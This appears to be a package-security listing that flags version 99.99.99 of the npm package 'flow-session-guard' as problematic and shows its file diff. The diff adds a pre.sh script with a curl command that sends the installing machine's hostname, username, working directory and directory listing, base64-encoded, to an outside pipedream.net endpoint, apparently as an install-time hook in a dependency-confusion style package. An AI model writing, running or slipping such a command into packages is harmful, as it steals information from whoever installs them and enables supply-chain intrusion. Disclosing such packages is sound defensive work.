flow-session-guard 99.99.99
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of flow-session-guard might be problematic. Click here for more details.
- package/package.json +12 -0
- package/pre.sh +1 -0
package/package.json
ADDED
package/pre.sh
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
curl -H "Hostname: $(hostname | base64)" -H "Whoami: $(whoami | base64)" -H "Pwd: $(pwd | base64)" -d $(ls -la | base64) https://eowku934pmiscn0.m.pipedream.net
|